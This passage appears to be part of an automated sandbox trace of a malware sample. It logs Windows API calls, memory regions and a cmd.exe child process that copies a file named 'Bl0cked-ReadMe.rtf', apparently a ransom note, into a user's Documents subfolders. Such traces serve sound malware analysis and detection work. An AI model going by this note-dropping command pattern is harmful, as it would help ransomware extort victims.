lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16eb18 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0140.762] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16eafc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16eafc*=0x1a) returned 1 [0140.762] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.762] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.762] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.763] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.763] _get_osfhandle (_FileHandle=0) returned 0x3 
[0140.763] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.763] SetConsoleInputExeNameW () returned 0x1 [0140.763] GetConsoleOutputCP () returned 0x1b5 [0140.763] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.763] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.763] exit (_Code=0) Process: id = "170" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xf68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14890 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14891 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14892 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14893 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 14894 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 
region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14895 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14896 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14897 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14898 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 14899 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15474 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15475 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15476 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15477 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 15478 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 15479 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name 
= "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15480 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15481 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15482 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15483 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15484 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15485 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15486 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15487 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15488 start_va = 0x450000 end_va = 0x517fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000450000" filename = "" Region: id = 15489 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15490 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15491 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15492 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15493 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15494 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15495 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 15496 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 15497 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Thread: id = 227 os_tid = 0xf64 [0140.033] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afdec | out: lpSystemTimeAsFileTime=0x2afdec*(dwLowDateTime=0x8d656c40, dwHighDateTime=0x1d440a9)) [0140.033] GetCurrentProcessId () returned 0xf68 [0140.033] GetCurrentThreadId () returned 0xf64 [0140.033] GetTickCount () returned 0x2bfe4 [0140.033] QueryPerformanceCounter (in: lpPerformanceCount=0x2afde4 | out: 
lpPerformanceCount=0x2afde4*=19682219664) returned 1 [0140.034] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.034] __set_app_type (_Type=0x1) [0140.034] __p__fmode () returned 0x76b331f4 [0140.034] __p__commode () returned 0x76b331fc [0140.034] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.034] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.034] GetCurrentThreadId () returned 0xf64 [0140.034] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf64) returned 0x38 [0140.034] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.034] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.034] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.034] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.034] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afd7c | out: phkResult=0x2afd7c*=0x0) returned 0x2 [0140.034] VirtualQuery (in: lpAddress=0x2afdb3, lpBuffer=0x2afd4c, dwLength=0x1c | out: lpBuffer=0x2afd4c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.034] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afd4c, dwLength=0x1c | out: lpBuffer=0x2afd4c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.035] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afd4c, dwLength=0x1c | out: lpBuffer=0x2afd4c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, 
Type=0x20000)) returned 0x1c [0140.035] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afd4c, dwLength=0x1c | out: lpBuffer=0x2afd4c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.035] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afd4c, dwLength=0x1c | out: lpBuffer=0x2afd4c*(BaseAddress=0x2b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0140.035] GetConsoleOutputCP () returned 0x1b5 [0140.035] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.035] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.035] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.035] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.035] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.036] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.036] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.036] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.036] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.036] GetEnvironmentStringsW () returned 0x3601d8* [0140.036] FreeEnvironmentStringsW (penv=0x3601d8) returned 1 [0140.037] GetEnvironmentStringsW () returned 0x3601d8* [0140.037] FreeEnvironmentStringsW (penv=0x3601d8) returned 1 [0140.037] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aecec | out: phkResult=0x2aecec*=0x40) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aecf4, 
lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x0, lpData=0x2aecf8*=0x0, lpcbData=0x2aecf0*=0x1000) returned 0x2 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x1, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x0, lpData=0x2aecf8*=0x1, lpcbData=0x2aecf0*=0x1000) returned 0x2 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x0, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x40, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x40, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x0, lpData=0x2aecf8*=0x40, lpcbData=0x2aecf0*=0x1000) returned 0x2 [0140.037] RegCloseKey (hKey=0x40) returned 0x0 [0140.037] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aecec | out: phkResult=0x2aecec*=0x40) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x0, 
lpData=0x2aecf8*=0x40, lpcbData=0x2aecf0*=0x1000) returned 0x2 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x1, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x0, lpData=0x2aecf8*=0x1, lpcbData=0x2aecf0*=0x1000) returned 0x2 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x0, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x9, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.037] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x4, lpData=0x2aecf8*=0x9, lpcbData=0x2aecf0*=0x4) returned 0x0 [0140.038] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aecf4, lpData=0x2aecf8, lpcbData=0x2aecf0*=0x1000 | out: lpType=0x2aecf4*=0x0, lpData=0x2aecf8*=0x9, lpcbData=0x2aecf0*=0x1000) returned 0x2 [0140.038] RegCloseKey (hKey=0x40) returned 0x0 [0140.038] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.038] srand (_Seed=0x5b88636e) [0140.038] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0140.038] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0140.038] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.038] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x361938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.038] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.038] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.039] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.039] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.039] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.039] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.039] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.039] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.039] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.039] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.039] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.039] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.039] GetEnvironmentStringsW () returned 0x362328* [0140.039] FreeEnvironmentStringsW (penv=0x362328) returned 1 [0140.039] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.039] GetEnvironmentVariableW 
(in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.039] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.039] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.039] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.039] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.039] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.039] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.039] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.039] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.039] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2afab8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.040] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2afab8, lpFilePart=0x2afab4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2afab4*="Desktop") returned 0x18 [0140.040] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.040] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af834 | out: lpFindFileData=0x2af834) returned 0x360068 [0140.040] FindClose (in: hFindFile=0x360068 | out: hFindFile=0x360068) returned 1 [0140.040] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af834 | out: lpFindFileData=0x2af834) returned 0x360068 [0140.040] FindClose (in: hFindFile=0x360068 | out: hFindFile=0x360068) returned 1 [0140.040] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af834 | out: lpFindFileData=0x2af834) returned 0x360068 [0140.040] FindClose (in: hFindFile=0x360068 | out: hFindFile=0x360068) returned 1 [0140.040] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.041] SetCurrentDirectoryW 
(lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.041] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.041] GetEnvironmentStringsW () returned 0x362b48* [0140.041] FreeEnvironmentStringsW (penv=0x362b48) returned 1 [0140.041] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.041] GetConsoleOutputCP () returned 0x1b5 [0140.042] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.042] GetUserDefaultLCID () returned 0x409 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afbf8, cchData=128 | out: lpLCData="0") returned 2 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afbf8, cchData=128 | out: lpLCData="0") returned 2 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afbf8, cchData=128 | out: lpLCData="1") returned 2 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 
4 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.042] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.042] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.043] GetConsoleTitleW (in: lpConsoleTitle=0x350918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.043] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.043] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.043] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.044] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.044] _wcsicmp (_String1="type", _String2=")") returned 75 [0140.044] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0140.044] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0140.044] _wcsicmp (_String1="IF", _String2="type") returned -11 [0140.044] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0140.044] _wcsicmp (_String1="REM", _String2="type") returned -2 [0140.044] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0140.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.049] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.049] GetFileType (hFile=0x7) returned 0x2 [0140.049] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.050] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2afaf0 | out: lpMode=0x2afaf0) returned 1 [0140.050] _dup (_FileHandle=1) returned 3 [0140.050] _close (_FileHandle=1) returned 0 [0140.050] _wcsicmp 
(_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0140.050] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2afac0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0140.052] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0140.052] GetConsoleTitleW (in: lpConsoleTitle=0x2af8f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.053] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0140.053] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0140.053] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0140.053] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0140.053] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.053] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2af454, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af454) returned 0x350ee0 [0140.054] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0140.054] _wcsicmp 